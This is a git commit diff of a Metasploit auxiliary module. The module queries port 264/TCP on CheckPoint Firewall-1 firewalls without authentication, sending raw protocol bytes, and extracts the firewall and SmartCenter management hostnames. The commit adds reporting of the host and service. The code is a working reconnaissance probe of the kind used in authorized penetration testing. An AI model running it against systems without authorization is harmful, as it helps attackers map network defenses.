commit
27d3edea63
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -9,28 +5,26 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
|
||||
'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
|
||||
'Description' => %q{
|
||||
This module sends a query to the TCP port 264 on CheckPoint
|
||||
This module sends a query to the port 264/TCP on CheckPoint Firewall-1
|
||||
firewalls to obtain the firewall name and management station
|
||||
(such as SmartCenter) name.
|
||||
(such as SmartCenter) name via a pre-authentication topology request.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
|
||||
[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
|
||||
[ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related?
|
||||
]
|
||||
))
|
||||
|
||||
|
@ -45,7 +39,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
print_status("Attempting to contact Checkpoint FW1 Topology service...")
|
||||
print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
|
||||
fw_hostname = nil
|
||||
sc_hostname = nil
|
||||
|
||||
connect
|
||||
|
||||
sock.put("\x51\x00\x00\x00")
|
||||
|
@ -56,14 +53,39 @@ class Metasploit3 < Msf::Auxiliary
|
|||
sock.put("\x00\x00\x00\x0bsecuremote\x00")
|
||||
res = sock.get_once
|
||||
if (res =~ /CN\=(.+),O\=(.+)\./i)
|
||||
print_good("Firewall Host: #{$1}")
|
||||
print_good("SmartCenter Host: #{$2}")
|
||||
fw_hostname = $1
|
||||
sc_hostname = $2
|
||||
print_good("Firewall Host: #{fw_hostname}")
|
||||
print_good("SmartCenter Host: #{sc_hostname}")
|
||||
end
|
||||
else
|
||||
print_error("Unexpected response:\r\n#{res}")
|
||||
print_error("Unexpected response:\r\n#{res.inspect}")
|
||||
end
|
||||
|
||||
report_info(fw_hostname,sc_hostname)
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
# Only trust that it's real if we have a hostname. If you get a funny
|
||||
# response, it might not be what we think it is.
|
||||
def report_info(fw_hostname,sc_hostname)
|
||||
return unless fw_hostname
|
||||
host_info = {
|
||||
:host => datastore['RHOST'],
|
||||
:os_name => "Checkpoint Firewall-1",
|
||||
:purpose => "firewall"
|
||||
}
|
||||
host_info[:name] = fw_hostname
|
||||
host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
|
||||
report_host(host_info)
|
||||
svc_info = {
|
||||
:host => datastore['RHOST'],
|
||||
:port => datastore['RPORT'],
|
||||
:proto => "tcp",
|
||||
:name => "securemote"
|
||||
}
|
||||
report_service(svc_info)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue